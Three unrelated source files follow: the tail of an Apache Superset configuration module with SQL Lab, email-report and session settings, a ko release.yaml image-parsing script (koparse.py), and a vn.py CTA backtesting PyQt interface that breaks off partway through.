SQLLAB_VALIDATION_TIMEOUT = 10
# SQLLAB_DEFAULT_DBID
SQLLAB_DEFAULT_DBID = None
# The MAX duration (in seconds) a query can run for before being killed
# by celery.
SQLLAB_ASYNC_TIME_LIMIT_SEC = 60 * 60 * 6
# Some databases support running EXPLAIN queries that allow users to estimate
# query costs before they run. These EXPLAIN queries should have a small
# timeout.
SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT = 10 # seconds
# Flag that controls if limit should be enforced on the CTA (create table as queries).
SQLLAB_CTAS_NO_LIMIT = False
# This allows you to define custom logic around the "CREATE TABLE AS" or CTAS feature
# in SQL Lab that defines where the target schema should be for a given user.
# Database `CTAS Schema` has a precedence over this setting.
# Example below returns a username and CTA queries will write tables into the schema
# name `username`
# SQLLAB_CTAS_SCHEMA_NAME_FUNC = lambda database, user, schema, sql: user.username
# This is move involved example where depending on the database you can leverage data
# available to assign schema for the CTA query:
# def compute_schema_name(database: Database, user: User, schema: str, sql: str) -> str:
# if database.name == 'mysql_payments_slave':
# return 'tmp_superset_schema'
# if database.name == 'presto_gold':
# return user.username
# if database.name == 'analytics':
# if 'analytics' in [r.name for r in user.roles]:
# return 'analytics_cta'
# else:
# return f'tmp_{schema}'
# Function accepts database object, user object, schema name and sql that will be run.
SQLLAB_CTAS_SCHEMA_NAME_FUNC: Optional[
Callable[["Database", "models.User", str, str], str]
] = None
# If enabled, it can be used to store the results of long-running queries
# in SQL Lab by using the "Run Async" button/feature
RESULTS_BACKEND: Optional[BaseCache] = None
# Use PyArrow and MessagePack for async query results serialization,
# rather than JSON. This feature requires additional testing from the
# community before it is fully adopted, so this config option is provided
# in order to disable should breaking issues be discovered.
RESULTS_BACKEND_USE_MSGPACK = True
# The S3 bucket where you want to store your external hive tables created
# from CSV files. For example, 'companyname-superset'
CSV_TO_HIVE_UPLOAD_S3_BUCKET = None
# The directory within the bucket specified above that will
# contain all the external tables
CSV_TO_HIVE_UPLOAD_DIRECTORY = "EXTERNAL_HIVE_TABLES/"
# Function that creates upload directory dynamically based on the
# database used, user and schema provided.
CSV_TO_HIVE_UPLOAD_DIRECTORY_FUNC: Callable[
["Database", "models.User", str], Optional[str]
] = lambda database, user, schema: CSV_TO_HIVE_UPLOAD_DIRECTORY
# The namespace within hive where the tables created from
# uploading CSVs will be stored.
UPLOADED_CSV_HIVE_NAMESPACE: Optional[str] = None
# Function that computes the allowed schemas for the CSV uploads.
# Allowed schemas will be a union of schemas_allowed_for_csv_upload
# db configuration and a result of this function.
# mypy doesn't catch that if case ensures list content being always str
ALLOWED_USER_CSV_SCHEMA_FUNC: Callable[["Database", "models.User"], List[str]] = (
lambda database, user: [UPLOADED_CSV_HIVE_NAMESPACE]
if UPLOADED_CSV_HIVE_NAMESPACE
else []
)
# Values that should be treated as nulls for the csv uploads.
CSV_DEFAULT_NA_NAMES = list(STR_NA_VALUES)
# A dictionary of items that gets merged into the Jinja context for
# SQL Lab. The existing context gets updated with this dictionary,
# meaning values for existing keys get overwritten by the content of this
# dictionary.
JINJA_CONTEXT_ADDONS: Dict[str, Callable[..., Any]] = {}
# A dictionary of macro template processors that gets merged into global
# template processors. The existing template processors get updated with this
# dictionary, which means the existing keys get overwritten by the content of this
# dictionary. The customized addons don't necessarily need to use jinjia templating
# language. This allows you to define custom logic to process macro template.
CUSTOM_TEMPLATE_PROCESSORS: Dict[str, Type[BaseTemplateProcessor]] = {}
# Roles that are controlled by the API / Superset and should not be changes
# by humans.
ROBOT_PERMISSION_ROLES = ["Public", "Gamma", "Alpha", "Admin", "sql_lab"]
CONFIG_PATH_ENV_VAR = "SUPERSET_CONFIG_PATH"
# If a callable is specified, it will be called at app startup while passing
# a reference to the Flask app. This can be used to alter the Flask app
# in whatever way.
# example: FLASK_APP_MUTATOR = lambda x: x.before_request = f
FLASK_APP_MUTATOR = None
# Set this to false if you don't want users to be able to request/grant
# datasource access requests from/to other users.
ENABLE_ACCESS_REQUEST = False
# smtp server configuration
EMAIL_NOTIFICATIONS = False # all the emails are sent using dryrun
SMTP_HOST = "localhost"
SMTP_STARTTLS = True
SMTP_SSL = False
SMTP_USER = "superset"
SMTP_PORT = 25
SMTP_PASSWORD = "superset"
SMTP_MAIL_FROM = "[email protected]"
ENABLE_CHUNK_ENCODING = False
# Whether to bump the logging level to ERROR on the flask_appbuilder package
# Set to False if/when debugging FAB related issues like
# permission management
SILENCE_FAB = True
FAB_ADD_SECURITY_VIEWS = True
FAB_ADD_SECURITY_PERMISSION_VIEW = False
FAB_ADD_SECURITY_VIEW_MENU_VIEW = False
FAB_ADD_SECURITY_PERMISSION_VIEWS_VIEW = False
# The link to a page containing common errors and their resolutions
# It will be appended at the bottom of sql_lab errors.
TROUBLESHOOTING_LINK = ""
# CSRF token timeout, set to None for a token that never expires
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 7
# This link should lead to a page with instructions on how to gain access to a
# Datasource. It will be placed at the bottom of permissions errors.
PERMISSION_INSTRUCTIONS_LINK = ""
# Integrate external Blueprints to the app by passing them to your
# configuration. These blueprints will get integrated in the app
BLUEPRINTS: List[Blueprint] = []
# Provide a callable that receives a tracking_url and returns another
# URL. This is used to translate internal Hadoop job tracker URL
# into a proxied one
TRACKING_URL_TRANSFORMER = lambda x: x
# Interval between consecutive polls when using Hive Engine
HIVE_POLL_INTERVAL = 5
# Interval between consecutive polls when using Presto Engine
# See here: https://github.com/dropbox/PyHive/blob/8eb0aeab8ca300f3024655419b93dad926c1a351/pyhive/presto.py#L93 # pylint: disable=line-too-long
PRESTO_POLL_INTERVAL = 1
# Allow for javascript controls components
# this enables programmers to customize certain charts (like the
# geospatial ones) by inputing javascript in controls. This exposes
# an XSS security vulnerability
ENABLE_JAVASCRIPT_CONTROLS = False
# The id of a template dashboard that should be copied to every new user
DASHBOARD_TEMPLATE_ID = None
# A callable that allows altering the database conneciton URL and params
# on the fly, at runtime. This allows for things like impersonation or
# arbitrary logic. For instance you can wire different users to
# use different connection parameters, or pass their email address as the
# username. The function receives the connection uri object, connection
# params, the username, and returns the mutated uri and params objects.
# Example:
# def DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):
# user = security_manager.find_user(username=username)
# if user and user.email:
# uri.username = user.email
# return uri, params
#
# Note that the returned uri and params are passed directly to sqlalchemy's
# as such `create_engine(url, **params)`
DB_CONNECTION_MUTATOR = None
# A function that intercepts the SQL to be executed and can alter it.
# The use case is can be around adding some sort of comment header
# with information such as the username and worker node information
#
# def SQL_QUERY_MUTATOR(sql, username, security_manager):
# dttm = datetime.now().isoformat()
# return f"-- [SQL LAB] {username} {dttm}\n{sql}"
SQL_QUERY_MUTATOR = None
# Enable / disable scheduled email reports
ENABLE_SCHEDULED_EMAIL_REPORTS = False
# Enable / disable Alerts, where users can define custom SQL that
# will send emails with screenshots of charts or dashboards periodically
# if it meets the criteria
ENABLE_ALERTS = False
# Slack API token for the superset reports
SLACK_API_TOKEN = None
SLACK_PROXY = None
# If enabled, certail features are run in debug mode
# Current list:
# * Emails are sent using dry-run mode (logging only)
SCHEDULED_EMAIL_DEBUG_MODE = False
# This auth provider is used by background (offline) tasks that need to access
# protected resources. Can be overridden by end users in order to support
# custom auth mechanisms
MACHINE_AUTH_PROVIDER_CLASS = "superset.utils.machine_auth.MachineAuthProvider"
# Email reports - minimum time resolution (in minutes) for the crontab
EMAIL_REPORTS_CRON_RESOLUTION = 15
# The MAX duration (in seconds) a email schedule can run for before being killed
# by celery.
EMAIL_ASYNC_TIME_LIMIT_SEC = 300
# Email report configuration
# From address in emails
EMAIL_REPORT_FROM_ADDRESS = "[email protected]"
# Send bcc of all reports to this address. Set to None to disable.
# This is useful for maintaining an audit trail of all email deliveries.
EMAIL_REPORT_BCC_ADDRESS = None
# User credentials to use for generating reports
# This user should have permissions to browse all the dashboards and
# slices.
# TODO: In the future, login as the owner of the item to generate reports
EMAIL_REPORTS_USER = "admin"
EMAIL_REPORTS_SUBJECT_PREFIX = "[Report] "
# The webdriver to use for generating reports. Use one of the following
# firefox
# Requires: geckodriver and firefox installations
# Limitations: can be buggy at times
# chrome:
# Requires: headless chrome
# Limitations: unable to generate screenshots of elements
WEBDRIVER_TYPE = "firefox"
# Window size - this will impact the rendering of the data
WEBDRIVER_WINDOW = {"dashboard": (1600, 2000), "slice": (3000, 1200)}
# An optional override to the default auth hook used to provide auth to the
# offline webdriver
WEBDRIVER_AUTH_FUNC = None
# Any config options to be passed as-is to the webdriver
WEBDRIVER_CONFIGURATION: Dict[Any, Any] = {}
# Additional args to be passed as arguments to the config object
# Note: these options are Chrome-specific. For FF, these should
# only include the "--headless" arg
WEBDRIVER_OPTION_ARGS = [
"--force-device-scale-factor=2.0",
"--high-dpi-support=2.0",
"--headless",
]
# The base URL to query for accessing the user interface
WEBDRIVER_BASEURL = "http://0.0.0.0:8080/"
# The base URL for the email report hyperlinks.
WEBDRIVER_BASEURL_USER_FRIENDLY = WEBDRIVER_BASEURL
# Time in seconds, selenium will wait for the page to load
# and render for the email report.
EMAIL_PAGE_RENDER_WAIT = 30
# Send user to a link where they can report bugs
BUG_REPORT_URL = None
# Send user to a link where they can read more about Superset
DOCUMENTATION_URL = None
DOCUMENTATION_TEXT = "Documentation"
DOCUMENTATION_ICON = None # Recommended size: 16x16
# What is the Last N days relative in the time selector to:
# 'today' means it is midnight (00:00:00) in the local timezone
# 'now' means it is relative to the query issue time
# If both start and end time is set to now, this will make the time
# filter a moving window. By only setting the end time to now,
# start time will be set to midnight, while end will be relative to
# the query issue time.
DEFAULT_RELATIVE_START_TIME = "today"
DEFAULT_RELATIVE_END_TIME = "today"
# Configure which SQL validator to use for each engine
SQL_VALIDATORS_BY_ENGINE = {"presto": "PrestoDBSQLValidator"}
# Do you want Talisman enabled?
TALISMAN_ENABLED = False
# If you want Talisman, how do you want it configured??
TALISMAN_CONFIG = {
"content_security_policy": None,
"force_https": True,
"force_https_permanent": False,
}
# It is possible to customize which tables and roles are featured in the RLS
# dropdown. When set, this dict is assigned to `add_form_query_rel_fields` and
# `edit_form_query_rel_fields` on `RowLevelSecurityFiltersModelView`. Example:
#
# from flask_appbuilder.models.sqla import filters
# RLS_FORM_QUERY_REL_FIELDS = {
# "roles": [["name", filters.FilterStartsWith, "RlsRole"]]
# "tables": [["table_name", filters.FilterContains, "rls"]]
# }
RLS_FORM_QUERY_REL_FIELDS: Optional[Dict[str, List[List[Any]]]] = None
#
# Flask session cookie options
#
# See https://flask.palletsprojects.com/en/1.1.x/security/#set-cookie-options
# for details
#
SESSION_COOKIE_HTTPONLY = True # Prevent cookie from being read by frontend JS?
SESSION_COOKIE_SECURE = False # Prevent cookie from being transmitted over non-tls?
SESSION_COOKIE_SAMESITE = "Lax" # One of [None, 'None', 'Lax', 'Strict']
# Flask configuration variables
SEND_FILE_MAX_AGE_DEFAULT = 60 * 60 * 24 * 365 # Cache static resources
# URI to database storing the example data, points to
# SQLALCHEMY_DATABASE_URI by default if set to `None`
SQLALCHEMY_EXAMPLES_URI = None
# Some sqlalchemy connection strings can open Superset to security risks.
# Typically these should not be allowed.
PREVENT_UNSAFE_DB_CONNECTIONS = True
# Path used to store SSL certificates that are generated when using custom certs.
# Defaults to temporary directory.
# Example: SSL_CERT_PATH = "/certs"
SSL_CERT_PATH: Optional[str] = None
# SIP-15 should be enabled for all new Superset deployments which ensures that the time
# range endpoints adhere to [start, end). For existing deployments admins should provide
# a dedicated period of time to allow chart producers to update their charts before
# mass migrating all charts to use the [start, end) interval.
#
# Note if no end date for the grace period is specified then the grace period is
# indefinite.
SIP_15_ENABLED = True
SIP_15_GRACE_PERIOD_END: Optional[date] = None # exclusive
SIP_15_DEFAULT_TIME_RANGE_ENDPOINTS = ["unknown", "inclusive"]
SIP_15_TOAST_MESSAGE = (
"Action Required: Preview then save your chart using the "
'new time range endpoints <a target="_blank" href="{url}" '
'class="alert-link">here</a>.'
)
# SQLA table mutator, every time we fetch the metadata for a certain table
# (superset.connectors.sqla.models.SqlaTable), we call this hook
# to allow mutating the object with this callback.
# This can be used to set any properties of the object based on naming
# conventions and such. You can find examples in the tests.
SQLA_TABLE_MUTATOR = lambda table: table
if CONFIG_PATH_ENV_VAR in os.environ:
# Explicitly import config module that is not necessarily in pythonpath; useful
# for case where app is being executed via pex.
try:
cfg_path = os.environ[CONFIG_PATH_ENV_VAR]
module = sys.modules[__name__]
override_conf = imp.load_source("superset_config", cfg_path)
for key in dir(override_conf):
if key.isupper():
setattr(module, key, getattr(override_conf, key))
print(f"Loaded your LOCAL configuration at [{cfg_path}]")
except Exception:
logger.exception(
"Failed to import config for %s=%s", CONFIG_PATH_ENV_VAR, cfg_path
)
raise
elif importlib.util.find_spec("superset_config") and not is_test():
try:
import superset_config # pylint: disable=import-error
from superset_config import * # type: ignore # pylint: disable=import-error,wildcard-import,unused-wildcard-import
print(f"Loaded your LOCAL configuration at [{superset_config.__file__}]")
except Exception:
logger.exception("Found but failed to import local superset_config")
raise
|
the-stack_106_19042
|
#!/usr/bin/env python3
"""
koparse.py parses release.yaml files from `ko`
The `ko` tool (https://github.com/google/go-containerregistry/tree/master/cmd/ko)
builds images and embeds the full names of the built images in the resulting
yaml files.
This script does two things:
* Parses those image names out of the release.yaml, including their digests, and
outputs those to stdout
* Verifies the list of built images against an expected list, to be sure that all
expected images were built (and no extra images were built)
"""
import argparse
import re
import sys
from typing import List
DIGEST_MARKER = "@sha256"
class ImagesMismatchError(Exception):
def __init__(self, missing: List[str], extra: List[str]):
self.missing = missing
self.extra = extra
def __str__(self):
errs = []
if self.missing:
errs.append("Images %s were expected but missing." % self.missing)
if self.extra:
errs.append("Images %s were present but not expected." %
self.extra)
return " ".join(errs)
class BadActualImageFormatError(Exception):
def __init__(self, image: str):
self.image = image
def __str__(self):
return "Format of image %s was unexpected, did not contain %s" % (self.image, DIGEST_MARKER)
def parse_release(base: str, path: str) -> List[str]:
"""Extracts built images from the release.yaml at path
Args:
base: The built images will be expected to start with this string,
other images will be ignored
path: The path to the file (release.yaml) that will contain the built images
Returns:
list of the images parsed from the file
"""
images = []
with open(path) as f:
for line in f:
match = re.search(base + ".*" + DIGEST_MARKER + ":[0-9a-f]*", line)
if match:
images.append(match.group(0))
return images
def compare_expected_images(expected: List[str], actual: List[str]) -> None:
"""Ensures that the list of actual images includes only the expected images
Args:
expected: A list of all of the names of images that are expected to have
been built, including the path to the image without the digest
actual: A list of the names of the built images, including the path to the
image and the digest
"""
for image in actual:
if DIGEST_MARKER not in image:
raise BadActualImageFormatError(image)
actual_no_digest = [image.split(DIGEST_MARKER)[0] for image in actual]
missing = set(expected) - set(actual_no_digest)
extra = set(actual_no_digest) - set(expected)
if missing or extra:
raise ImagesMismatchError(list(missing), list(extra))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(
description="Parse expected built images from a release.yaml created by `ko`")
arg_parser.add_argument("--path", type=str, required=True,
help="Path to the release.yaml")
arg_parser.add_argument("--base", type=str, required=True,
help="String prefix which is used to find images within the release.yaml")
arg_parser.add_argument("--images", type=str, required=True, nargs="+",
help="List of all images expected to be built, without digests")
args = arg_parser.parse_args()
try:
images = parse_release(args.base, args.path)
compare_expected_images(args.images, images)
except (IOError, BadActualImageFormatError) as e:
sys.stderr.write("Error determining built images: %s\n" % e)
sys.exit(1)
except (ImagesMismatchError) as e:
sys.stderr.write("Expected images did not match: %s\n" % e)
with open(args.path) as f:
sys.stderr.write(f.read())
sys.exit(1)
print("\n".join(images))
|
the-stack_106_19043
|
import numpy as np
import pyqtgraph as pg
from datetime import datetime, timedelta
from ..engine import (
APP_NAME,
EVENT_BACKTESTER_LOG,
EVENT_BACKTESTER_BACKTESTING_FINISHED,
EVENT_BACKTESTER_OPTIMIZATION_FINISHED,
OptimizationSetting
)
from vnpy.trader.constant import Interval
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtCore, QtWidgets, QtGui
from vnpy.event import Event, EventEngine
class BacktesterManager(QtWidgets.QWidget):
""""""
signal_log = QtCore.pyqtSignal(Event)
signal_backtesting_finished = QtCore.pyqtSignal(Event)
signal_optimization_finished = QtCore.pyqtSignal(Event)
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__()
self.main_engine = main_engine
self.event_engine = event_engine
self.backtester_engine = main_engine.get_engine(APP_NAME)
self.class_names = []
self.settings = {}
self.target_display = ""
self.init_strategy_settings()
self.init_ui()
self.register_event()
self.backtester_engine.init_engine()
def init_strategy_settings(self):
""""""
self.class_names = self.backtester_engine.get_strategy_class_names()
for class_name in self.class_names:
setting = self.backtester_engine.get_default_setting(class_name)
self.settings[class_name] = setting
def init_ui(self):
""""""
self.setWindowTitle("CTA回测")
# Setting Part
self.class_combo = QtWidgets.QComboBox()
self.class_combo.addItems(self.class_names)
self.symbol_line = QtWidgets.QLineEdit("IF88.CFFEX")
self.interval_combo = QtWidgets.QComboBox()
for inteval in Interval:
self.interval_combo.addItem(inteval.value)
end_dt = datetime.now()
start_dt = end_dt - timedelta(days=3 * 365)
self.start_date_edit = QtWidgets.QDateEdit(
QtCore.QDate(
start_dt.year,
start_dt.month,
start_dt.day
)
)
self.end_date_edit = QtWidgets.QDateEdit(
QtCore.QDate.currentDate()
)
self.rate_line = QtWidgets.QLineEdit("0.000025")
self.slippage_line = QtWidgets.QLineEdit("0.2")
self.size_line = QtWidgets.QLineEdit("300")
self.pricetick_line = QtWidgets.QLineEdit("0.2")
self.capital_line = QtWidgets.QLineEdit("1000000")
backtesting_button = QtWidgets.QPushButton("开始回测")
backtesting_button.clicked.connect(self.start_backtesting)
optimization_button = QtWidgets.QPushButton("参数优化")
optimization_button.clicked.connect(self.start_optimization)
self.result_button = QtWidgets.QPushButton("优化结果")
self.result_button.clicked.connect(self.show_optimization_result)
self.result_button.setEnabled(False)
downloading_button = QtWidgets.QPushButton("下载数据")
downloading_button.clicked.connect(self.start_downloading)
for button in [
backtesting_button,
optimization_button,
downloading_button,
self.result_button
]:
button.setFixedHeight(button.sizeHint().height() * 2)
form = QtWidgets.QFormLayout()
form.addRow("交易策略", self.class_combo)
form.addRow("本地代码", self.symbol_line)
form.addRow("K线周期", self.interval_combo)
form.addRow("开始日期", self.start_date_edit)
form.addRow("结束日期", self.end_date_edit)
form.addRow("手续费率", self.rate_line)
form.addRow("交易滑点", self.slippage_line)
form.addRow("合约乘数", self.size_line)
form.addRow("价格跳动", self.pricetick_line)
form.addRow("回测资金", self.capital_line)
form.addRow(backtesting_button)
left_vbox = QtWidgets.QVBoxLayout()
left_vbox.addLayout(form)
left_vbox.addWidget(downloading_button)
left_vbox.addStretch()
left_vbox.addWidget(optimization_button)
left_vbox.addWidget(self.result_button)
# Result part
self.statistics_monitor = StatisticsMonitor()
self.log_monitor = QtWidgets.QTextEdit()
self.log_monitor.setMaximumHeight(400)
self.chart = BacktesterChart()
self.chart.setMinimumWidth(1000)
# Layout
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.statistics_monitor)
vbox.addWidget(self.log_monitor)
hbox = QtWidgets.QHBoxLayout()
hbox.addLayout(left_vbox)
hbox.addLayout(vbox)
hbox.addWidget(self.chart)
self.setLayout(hbox)
def register_event(self):
""""""
self.signal_log.connect(self.process_log_event)
self.signal_backtesting_finished.connect(
self.process_backtesting_finished_event)
self.signal_optimization_finished.connect(
self.process_optimization_finished_event)
self.event_engine.register(EVENT_BACKTESTER_LOG, self.signal_log.emit)
self.event_engine.register(
EVENT_BACKTESTER_BACKTESTING_FINISHED, self.signal_backtesting_finished.emit)
self.event_engine.register(
EVENT_BACKTESTER_OPTIMIZATION_FINISHED, self.signal_optimization_finished.emit)
def process_log_event(self, event: Event):
""""""
msg = event.data
self.write_log(msg)
def write_log(self, msg):
""""""
timestamp = datetime.now().strftime("%H:%M:%S")
msg = f"{timestamp}\t{msg}"
self.log_monitor.append(msg)
def process_backtesting_finished_event(self, event: Event):
""""""
statistics = self.backtester_engine.get_result_statistics()
self.statistics_monitor.set_data(statistics)
df = self.backtester_engine.get_result_df()
self.chart.set_data(df)
def process_optimization_finished_event(self, event: Event):
""""""
self.write_log("请点击[优化结果]按钮查看")
self.result_button.setEnabled(True)
def start_backtesting(self):
""""""
class_name = self.class_combo.currentText()
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
rate = float(self.rate_line.text())
slippage = float(self.slippage_line.text())
size = float(self.size_line.text())
pricetick = float(self.pricetick_line.text())
capital = float(self.capital_line.text())
old_setting = self.settings[class_name]
dialog = BacktestingSettingEditor(class_name, old_setting)
i = dialog.exec()
if i != dialog.Accepted:
return
new_setting = dialog.get_setting()
self.settings[class_name] = new_setting
result = self.backtester_engine.start_backtesting(
class_name,
vt_symbol,
interval,
start,
end,
rate,
slippage,
size,
pricetick,
capital,
new_setting
)
if result:
self.statistics_monitor.clear_data()
self.chart.clear_data()
def start_optimization(self):
""""""
class_name = self.class_combo.currentText()
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
rate = float(self.rate_line.text())
slippage = float(self.slippage_line.text())
size = float(self.size_line.text())
pricetick = float(self.pricetick_line.text())
capital = float(self.capital_line.text())
parameters = self.settings[class_name]
dialog = OptimizationSettingEditor(class_name, parameters)
i = dialog.exec()
if i != dialog.Accepted:
return
optimization_setting, use_ga = dialog.get_setting()
self.target_display = dialog.target_display
self.backtester_engine.start_optimization(
class_name,
vt_symbol,
interval,
start,
end,
rate,
slippage,
size,
pricetick,
capital,
optimization_setting,
use_ga
)
self.result_button.setEnabled(False)
def start_downloading(self):
""""""
vt_symbol = self.symbol_line.text()
interval = self.interval_combo.currentText()
start = self.start_date_edit.date().toPyDate()
end = self.end_date_edit.date().toPyDate()
self.backtester_engine.start_downloading(
vt_symbol,
interval,
start,
end
)
def show_optimization_result(self):
""""""
result_values = self.backtester_engine.get_result_values()
dialog = OptimizationResultMonitor(
result_values,
self.target_display
)
dialog.exec_()
def show(self):
""""""
self.showMaximized()
class StatisticsMonitor(QtWidgets.QTableWidget):
""""""
KEY_NAME_MAP = {
"start_date": "首个交易日",
"end_date": "最后交易日",
"total_days": "总交易日",
"profit_days": "盈利交易日",
"loss_days": "亏损交易日",
"capital": "起始资金",
"end_balance": "结束资金",
"total_return": "总收益率",
"annual_return": "年化收益",
"max_drawdown": "最大回撤",
"max_ddpercent": "百分比最大回撤",
"total_net_pnl": "总盈亏",
"total_commission": "总手续费",
"total_slippage": "总滑点",
"total_turnover": "总成交额",
"total_trade_count": "总成交笔数",
"daily_net_pnl": "日均盈亏",
"daily_commission": "日均手续费",
"daily_slippage": "日均滑点",
"daily_turnover": "日均成交额",
"daily_trade_count": "日均成交笔数",
"daily_return": "日均收益率",
"return_std": "收益标准差",
"sharpe_ratio": "夏普比率",
"return_drawdown_ratio": "收益回撤比"
}
def __init__(self):
""""""
super().__init__()
self.cells = {}
self.init_ui()
def init_ui(self):
""""""
self.setRowCount(len(self.KEY_NAME_MAP))
self.setVerticalHeaderLabels(list(self.KEY_NAME_MAP.values()))
self.setColumnCount(1)
self.horizontalHeader().setVisible(False)
self.horizontalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.Stretch
)
self.setEditTriggers(self.NoEditTriggers)
for row, key in enumerate(self.KEY_NAME_MAP.keys()):
cell = QtWidgets.QTableWidgetItem()
self.setItem(row, 0, cell)
self.cells[key] = cell
def clear_data(self):
""""""
for cell in self.cells.values():
cell.setText("")
def set_data(self, data: dict):
""""""
data["capital"] = f"{data['capital']:,.2f}"
data["end_balance"] = f"{data['end_balance']:,.2f}"
data["total_return"] = f"{data['total_return']:,.2f}%"
data["annual_return"] = f"{data['annual_return']:,.2f}%"
data["max_drawdown"] = f"{data['max_drawdown']:,.2f}"
data["max_ddpercent"] = f"{data['max_ddpercent']:,.2f}%"
data["total_net_pnl"] = f"{data['total_net_pnl']:,.2f}"
data["total_commission"] = f"{data['total_commission']:,.2f}"
data["total_slippage"] = f"{data['total_slippage']:,.2f}"
data["total_turnover"] = f"{data['total_turnover']:,.2f}"
data["daily_net_pnl"] = f"{data['daily_net_pnl']:,.2f}"
data["daily_commission"] = f"{data['daily_commission']:,.2f}"
data["daily_slippage"] = f"{data['daily_slippage']:,.2f}"
data["daily_turnover"] = f"{data['daily_turnover']:,.2f}"
data["daily_return"] = f"{data['daily_return']:,.2f}%"
data["return_std"] = f"{data['return_std']:,.2f}%"
data["sharpe_ratio"] = f"{data['sharpe_ratio']:,.2f}"
data["return_drawdown_ratio"] = f"{data['return_drawdown_ratio']:,.2f}"
for key, cell in self.cells.items():
value = data.get(key, "")
cell.setText(str(value))
class BacktestingSettingEditor(QtWidgets.QDialog):
"""
For creating new strategy and editing strategy parameters.
"""
def __init__(
self, class_name: str, parameters: dict
):
""""""
super(BacktestingSettingEditor, self).__init__()
self.class_name = class_name
self.parameters = parameters
self.edits = {}
self.init_ui()
def init_ui(self):
""""""
form = QtWidgets.QFormLayout()
# Add vt_symbol and name edit if add new strategy
self.setWindowTitle(f"策略参数配置:{self.class_name}")
button_text = "确定"
parameters = self.parameters
for name, value in parameters.items():
type_ = type(value)
edit = QtWidgets.QLineEdit(str(value))
if type_ is int:
validator = QtGui.QIntValidator()
edit.setValidator(validator)
elif type_ is float:
validator = QtGui.QDoubleValidator()
edit.setValidator(validator)
form.addRow(f"{name} {type_}", edit)
self.edits[name] = (edit, type_)
button = QtWidgets.QPushButton(button_text)
button.clicked.connect(self.accept)
form.addRow(button)
self.setLayout(form)
def get_setting(self):
""""""
setting = {}
for name, tp in self.edits.items():
edit, type_ = tp
value_text = edit.text()
if type_ == bool:
if value_text == "True":
value = True
else:
value = False
else:
value = type_(value_text)
setting[name] = value
return setting
class BacktesterChart(pg.GraphicsWindow):
""""""
def __init__(self):
""""""
super().__init__(title="Backtester Chart")
self.dates = {}
self.init_ui()
def init_ui(self):
""""""
pg.setConfigOptions(antialias=True)
# Create plot widgets
self.balance_plot = self.addPlot(
title="账户净值",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.drawdown_plot = self.addPlot(
title="净值回撤",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.pnl_plot = self.addPlot(
title="每日盈亏",
axisItems={"bottom": DateAxis(self.dates, orientation="bottom")}
)
self.nextRow()
self.distribution_plot = self.addPlot(title="盈亏分布")
# Add curves and bars on plot widgets
self.balance_curve = self.balance_plot.plot(
pen=pg.mkPen("#ffc107", width=3)
)
dd_color = "#303f9f"
self.drawdown_curve = self.drawdown_plot.plot(
fillLevel=-0.3, brush=dd_color, pen=dd_color
)
profit_color = 'r'
loss_color = 'g'
self.profit_pnl_bar = pg.BarGraphItem(
x=[], height=[], width=0.3, brush=profit_color, pen=profit_color
)
self.loss_pnl_bar = pg.BarGraphItem(
x=[], height=[], width=0.3, brush=loss_color, pen=loss_color
)
self.pnl_plot.addItem(self.profit_pnl_bar)
self.pnl_plot.addItem(self.loss_pnl_bar)
distribution_color = "#6d4c41"
self.distribution_curve = self.distribution_plot.plot(
fillLevel=-0.3, brush=distribution_color, pen=distribution_color
)
def clear_data(self):
""""""
self.balance_curve.setData([], [])
self.drawdown_curve.setData([], [])
self.profit_pnl_bar.setOpts(x=[], height=[])
self.loss_pnl_bar.setOpts(x=[], height=[])
self.distribution_curve.setData([], [])
def set_data(self, df):
""""""
if df is None:
return
count = len(df)
self.dates.clear()
for n, date in enumerate(df.index):
self.dates[n] = date
# Set data for curve of balance and drawdown
self.balance_curve.setData(df["balance"])
self.drawdown_curve.setData(df["drawdown"])
# Set data for daily pnl bar
profit_pnl_x = []
profit_pnl_height = []
loss_pnl_x = []
loss_pnl_height = []
for count, pnl in enumerate(df["net_pnl"]):
if pnl >= 0:
profit_pnl_height.append(pnl)
profit_pnl_x.append(count)
else:
loss_pnl_height.append(pnl)
loss_pnl_x.append(count)
self.profit_pnl_bar.setOpts(x=profit_pnl_x, height=profit_pnl_height)
self.loss_pnl_bar.setOpts(x=loss_pnl_x, height=loss_pnl_height)
# Set data for pnl distribution
hist, x = np.histogram(df["net_pnl"], bins="auto")
x = x[:-1]
self.distribution_curve.setData(x, hist)
class DateAxis(pg.AxisItem):
"""Axis for showing date data"""
def __init__(self, dates: dict, *args, **kwargs):
""""""
super().__init__(*args, **kwargs)
self.dates = dates
def tickStrings(self, values, scale, spacing):
""""""
strings = []
for v in values:
dt = self.dates.get(v, "")
strings.append(str(dt))
return strings
class OptimizationSettingEditor(QtWidgets.QDialog):
"""
For setting up parameters for optimization.
"""
DISPLAY_NAME_MAP = {
"总收益率": "total_return",
"夏普比率": "sharpe_ratio",
"收益回撤比": "return_drawdown_ratio",
"日均盈亏": "daily_net_pnl"
}
def __init__(
self, class_name: str, parameters: dict
):
""""""
super().__init__()
self.class_name = class_name
self.parameters = parameters
self.edits = {}
self.optimization_setting = None
self.use_ga = False
self.init_ui()
def init_ui(self):
""""""
QLabel = QtWidgets.QLabel
self.target_combo = QtWidgets.QComboBox()
self.target_combo.addItems(list(self.DISPLAY_NAME_MAP.keys()))
grid = QtWidgets.QGridLayout()
grid.addWidget(QLabel("目标"), 0, 0)
grid.addWidget(self.target_combo, 0, 1, 1, 3)
grid.addWidget(QLabel("参数"), 1, 0)
grid.addWidget(QLabel("开始"), 1, 1)
grid.addWidget(QLabel("步进"), 1, 2)
grid.addWidget(QLabel("结束"), 1, 3)
# Add vt_symbol and name edit if add new strategy
self.setWindowTitle(f"优化参数配置:{self.class_name}")
validator = QtGui.QDoubleValidator()
row = 2
for name, value in self.parameters.items():
type_ = type(value)
if type_ not in [int, float]:
continue
